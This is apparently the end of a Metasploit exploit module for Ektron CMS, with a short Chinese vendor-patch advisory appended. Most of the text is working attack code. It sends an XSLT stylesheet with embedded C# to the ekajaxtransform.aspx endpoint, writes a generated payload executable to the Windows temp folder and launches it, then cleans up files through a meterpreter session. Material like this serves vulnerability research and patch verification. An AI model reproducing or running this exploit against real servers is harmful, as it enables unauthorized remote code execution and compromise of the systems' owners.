if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
windir = session.fs.file.expand_path("%WINDIR%")
win_file = "#{windir}\\Temp\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
# read-only flag with a command.
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
print_good("Deleted #{file}")
true
rescue ::Rex::Post::Meterpreter::RequestError
print_error("Failed to delete #{win_file}")
false
end
end
end
end
def uri_path
uri_path = target_uri.path
uri_path << "/" if uri_path[-1, 1] != "/"
uri_path
end
def build_referer
if datastore['SSL']
schema = "https://"
else
schema = "http://"
end
referer = schema
referer << rhost
referer << ":#{rport}"
referer << uri_path
referer
end
def exploit
print_status("Generating the EXE Payload and the XSLT...")
exe_data = generate_payload_exe
exe_string = Rex::Text.to_hex(exe_data)
exename = rand_text_alpha(5 + rand(5))
fingerprint = rand_text_alpha(5 + rand(5))
xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
char[] charData = "#{exe_string}".ToCharArray();
string fileName = @"C:\\windows\\temp\\#{exename}.txt";
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
for (int i = 0; i < charData.Length; i++)
{
bw.Write( (byte) charData[i]);
}
bw.Close();
fs.Close();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
p.Start();
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
XSLT
print_status("Trying to run the xslt transformation...")
res = send_request_cgi(
{
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
'headers' => {
"Referer" => build_referer
},
'vars_post' => {
"xml" => rand_text_alpha(5 + rand(5)),
"xslt" => xslt_data
}
})
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
print_good("Exploitation was successful")
register_file_for_cleanup("#{exename}.txt")
else
fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
end
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Ektron
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: